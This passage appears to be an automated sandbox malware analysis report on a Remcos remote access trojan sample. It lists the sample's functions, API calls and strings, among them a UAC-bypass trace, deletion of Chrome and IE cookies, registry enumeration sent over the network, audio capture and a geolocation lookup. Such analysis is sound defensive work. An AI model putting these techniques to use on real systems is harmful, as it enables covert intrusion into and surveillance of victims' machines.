                                                                                                                                                                                              • API ID: __freea$__alloca_probe_16
                                                                                                                                                                                              • String ID: a/p$am/pm$fD
                                                                                                                                                                                              • API String ID: 3509577899-1143445303
                                                                                                                                                                                              • Opcode ID: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                                                                                                                                                              • Instruction ID: b3ac1812908cceb8a5e393dcdb4c984f4f77018dd86d4d200126c6f407000a93
                                                                                                                                                                                              • Opcode Fuzzy Hash: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 45D10171900205EAFB289F68D9456BBB7B0FF06700F26415BE9019B349D37D9D81CB6B
                                                                                                                                                                                              Function 0044F816 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                              • Opcode ID: 6141bfdb7684140d9b9f029a8ead33158da868342510b0366010e9dcd8c93941
                                                                                                                                                                                              • Instruction ID: 4bbe003d1bf73c874d2a573eb0f11032bb863b1283a960f175a06077317d427c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6141bfdb7684140d9b9f029a8ead33158da868342510b0366010e9dcd8c93941
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D61CE71D00205AFEB20DF69C842BAABBF5EB45320F14407BE844EB281E7759D45CB59
                                                                                                                                                                                              Function 00443F8B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00446B0F: HeapAlloc.KERNEL32(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
                                                                                                                                                                                              • _free.LIBCMT ref: 00444096
                                                                                                                                                                                              • _free.LIBCMT ref: 004440AD
                                                                                                                                                                                              • _free.LIBCMT ref: 004440CC
                                                                                                                                                                                              • _free.LIBCMT ref: 004440E7
                                                                                                                                                                                              • _free.LIBCMT ref: 004440FE
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _free$AllocHeap
                                                                                                                                                                                              • String ID: Z7D
                                                                                                                                                                                              • API String ID: 1835388192-2145146825
                                                                                                                                                                                              • Opcode ID: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                                                                                                                                                              • Instruction ID: 35b293ba1399b13e66314f32d3a1361244e269274da5e60bce22b88c1773d583
                                                                                                                                                                                              • Opcode Fuzzy Hash: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1451D131A00604AFEB20DF66C841B6A77F4EF99724B14456EE909D7251E739EE118B88
                                                                                                                                                                                              Function 0044A0D3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A848,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A115
                                                                                                                                                                                              • __fassign.LIBCMT ref: 0044A190
                                                                                                                                                                                              • __fassign.LIBCMT ref: 0044A1AB
                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1D1
                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,00000000,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A1F0
                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A229
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                                                              • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                                                                                              • Instruction ID: e447b7b613fb78ded26f6ec2e5332222395caf0b7731ddcd5a4cfd0c244b89ef
                                                                                                                                                                                              • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                                                                                              • Instruction Fuzzy Hash: FB51C270E002499FEB10CFA8D881AEEBBF8FF09310F14416BE955E7351D6749A51CB6A
                                                                                                                                                                                              Function 00401768 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 142threadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 004017F4
                                                                                                                                                                                                • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,00475B90,00475C10,?,0040179E,00475C10), ref: 00433534
                                                                                                                                                                                                • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475C10), ref: 00433571
                                                                                                                                                                                              • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                                                                                                                                • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                                                                                                                • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475C10,?,004017C1,00475C10,00000000), ref: 004334E9
                                                                                                                                                                                                • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475C10,00000000), ref: 0043351C
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                                                                                              • String ID: T=G$>G$>G
                                                                                                                                                                                              • API String ID: 1596592924-1617985637
                                                                                                                                                                                              • Opcode ID: 88022268fe3ca53b7ee126a34617c6b967d0ef3f346763fa63774eaa4140af22
                                                                                                                                                                                              • Instruction ID: 0943ace0b6a80c7a2dd7ea0048a529cdefdd5a29547fab9333b46e46416e0a54
                                                                                                                                                                                              • Opcode Fuzzy Hash: 88022268fe3ca53b7ee126a34617c6b967d0ef3f346763fa63774eaa4140af22
                                                                                                                                                                                              • Instruction Fuzzy Hash: D941F0716042008BC325FB75DDA6AAE73A4EB90318F00453FF50AAB1F2DF789985C65E
                                                                                                                                                                                              Function 00412C88 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                                                                                                                                • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                                                                                                • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                              • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                                                                                              • String ID: TUFTUF$>G$DG$DG
                                                                                                                                                                                              • API String ID: 3114080316-344394840
                                                                                                                                                                                              • Opcode ID: de4befe685273e7bf067e3fe47780df676ebf89a32a955f1e6b39ea8039125ff
                                                                                                                                                                                              • Instruction ID: 977689a643a5ec5a4c60f988ad8168500f8ba0dfdc14b2429fd77a11b5167535
                                                                                                                                                                                              • Opcode Fuzzy Hash: de4befe685273e7bf067e3fe47780df676ebf89a32a955f1e6b39ea8039125ff
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9041A2316042009BC224F635D8A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                                                                                                                              Function 00437A90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00437ABB
                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AC3
                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00437B51
                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B7C
                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00437BD1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                                                              • Opcode ID: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                                                                                                                                                              • Instruction ID: 71a827b8039fc8fef17eb0172cb9efd804432aff4b2936af944e1c8a38ed202f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 07410870A04209DBCF20EF29C884A9FBBB4AF08328F149156E8556B352D739EE01CF95
                                                                                                                                                                                              Function 0040B6EA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                                                                                • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                                                                                • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                                                                                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                                                                                              • API String ID: 1133728706-4073444585
                                                                                                                                                                                              • Opcode ID: bbd59c4342a3f048f0a7499dd9cd327f959f912607a0dc40202ba9ee31ab275b
                                                                                                                                                                                              • Instruction ID: c183ecd3189b8021203cc80da109e2de7a31ac9d6a13988019f9cddb43f3bc3e
                                                                                                                                                                                              • Opcode Fuzzy Hash: bbd59c4342a3f048f0a7499dd9cd327f959f912607a0dc40202ba9ee31ab275b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 84216D71900219A6CB04F7B2DCA69EE7764AE95318F40013FA902771D2EB7C9A49C6DE
                                                                                                                                                                                              Function 00455913 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                                                                                                                                                              • Instruction ID: c456bd3af877b6cafd4b53f13a87e342c7fa5de46f767ee01c057a6e18c8cad8
                                                                                                                                                                                              • Opcode Fuzzy Hash: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                                                                                                                                                              • Instruction Fuzzy Hash: 401102B1508615FBDB206F729C4593B7BACEF82772B20016FFC05C6242DA3CC801D669
                                                                                                                                                                                              Function 0040FBEF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                                                                                                                              • int.LIBCPMT ref: 0040FC0F
                                                                                                                                                                                                • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                                                                                                • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                                                              • String ID: p[G
                                                                                                                                                                                              • API String ID: 2536120697-440918510
                                                                                                                                                                                              • Opcode ID: 34d2c97419ff9ea43b4d99934c17e21ff42c81eb248cc24d2bbad1ad966fea40
                                                                                                                                                                                              • Instruction ID: 57388c14a05e53b5f50c1e79e3c37d993a50775a9f2b0ccff9e8b1bf96635e0f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 34d2c97419ff9ea43b4d99934c17e21ff42c81eb248cc24d2bbad1ad966fea40
                                                                                                                                                                                              • Instruction Fuzzy Hash: BD110232904519A7CB10FBA5D8469EEB7289E84358F20007BF805B72C1EB7CAF45C78D
                                                                                                                                                                                              Function 0041A52B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68networkfileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A54E
                                                                                                                                                                                              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A564
                                                                                                                                                                                              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A57D
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0041A5C3
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0041A5C6
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • http://geoplugin.net/json.gp, xrefs: 0041A55E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                                                                              • String ID: http://geoplugin.net/json.gp
                                                                                                                                                                                              • API String ID: 3121278467-91888290
                                                                                                                                                                                              • Opcode ID: 277b3accc4d7b5025d2c7427303433e7431fc8b467990071231497c86fa6234c
                                                                                                                                                                                              • Instruction ID: 987b679836a9d55d587b89d74e0435f254c545d991055b4d64d2ada4334a4818
                                                                                                                                                                                              • Opcode Fuzzy Hash: 277b3accc4d7b5025d2c7427303433e7431fc8b467990071231497c86fa6234c
                                                                                                                                                                                              • Instruction Fuzzy Hash: C111C4311093126BD224EA169C45DBF7FEDEF86365F00043EF905E2192DB689848C6BA
                                                                                                                                                                                              Function 0044FCEB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 0044FA32: _free.LIBCMT ref: 0044FA5B
                                                                                                                                                                                              • _free.LIBCMT ref: 0044FD39
                                                                                                                                                                                                • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                              • _free.LIBCMT ref: 0044FD44
                                                                                                                                                                                              • _free.LIBCMT ref: 0044FD4F
                                                                                                                                                                                              • _free.LIBCMT ref: 0044FDA3
                                                                                                                                                                                              • _free.LIBCMT ref: 0044FDAE
                                                                                                                                                                                              • _free.LIBCMT ref: 0044FDB9
                                                                                                                                                                                              • _free.LIBCMT ref: 0044FDC4
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                              • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                                                                                              • Instruction ID: b610107d28af63220697d29f7fc6270dd0ec529a0d2d9973413717ad3690abbb
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                                                                                              • Instruction Fuzzy Hash: B5116071581B44ABE520F7B2CC07FCB77DDDF02708F404C2EB29E76052EA68B90A4655
                                                                                                                                                                                              Function 00406815 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\4XYAW8PbZH.exe), ref: 00406835
                                                                                                                                                                                                • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                                                                                                                                • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 0040688E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\4XYAW8PbZH.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                                                                                              • API String ID: 3851391207-2454154425
                                                                                                                                                                                              • Opcode ID: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                                                                                                                                                                                              • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                                                                                                                                                                                              • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                                                                                                                              Function 0040FED2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                                                                                                                              • int.LIBCPMT ref: 0040FEF2
                                                                                                                                                                                                • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                                                                                                • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                                                              • String ID: h]G
                                                                                                                                                                                              • API String ID: 2536120697-1579725984
                                                                                                                                                                                              • Opcode ID: f9aa0e65a7bbfdd7a7f79a788d404fc3f4b750e419fadc6b529989e89958da83
                                                                                                                                                                                              • Instruction ID: faa6495482ffb760010bfa20be6f485864068761b5f97391b19e5f0bde606c56
                                                                                                                                                                                              • Opcode Fuzzy Hash: f9aa0e65a7bbfdd7a7f79a788d404fc3f4b750e419fadc6b529989e89958da83
                                                                                                                                                                                              • Instruction Fuzzy Hash: 10119D3190041AABCB24FBA5C8468DDB7699E85718B20057FF505B72C1EB78AE09C789
                                                                                                                                                                                              Function 0040B2A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                                                                                                                              • [Chrome Cookies not found], xrefs: 0040B308
                                                                                                                                                                                              • UserProfile, xrefs: 0040B2B4
                                                                                                                                                                                              • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: DeleteErrorFileLast
                                                                                                                                                                                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                                                                                              • API String ID: 2018770650-304995407
                                                                                                                                                                                              • Opcode ID: f29ab34f5f3b23139b2c689574f5439d44e644a4acc68cd0207f5b0faff05a8e
                                                                                                                                                                                              • Instruction ID: 57831ae66bbe87b328e3caf482cfdb9a18bfb77b2c204d956758bc207329a0f7
                                                                                                                                                                                              • Opcode Fuzzy Hash: f29ab34f5f3b23139b2c689574f5439d44e644a4acc68cd0207f5b0faff05a8e
                                                                                                                                                                                              • Instruction Fuzzy Hash: ED01A23164410557CB0477B5DD6B8AF3624ED50708F60013FF802B22E2FE3A9A0586CE
                                                                                                                                                                                              Function 0041BEC0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • AllocConsole.KERNEL32(00474358), ref: 0041BEC9
                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0041BEE2
                                                                                                                                                                                              • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BF07
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Console$AllocOutputShowWindow
                                                                                                                                                                                              • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                                                                                                                                              • API String ID: 2425139147-2527699604
                                                                                                                                                                                              • Opcode ID: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                                                                                                                                                                                              • Instruction ID: 29466b5f89b818b32aee09a22b3208d506810ef61d6e100b210d0f7536d9046d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F0121B1980304BAD600FBF29D4BFDD37AC9B14705F5004277648EB193E6BCA554466D
                                                                                                                                                                                              Function 004064D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
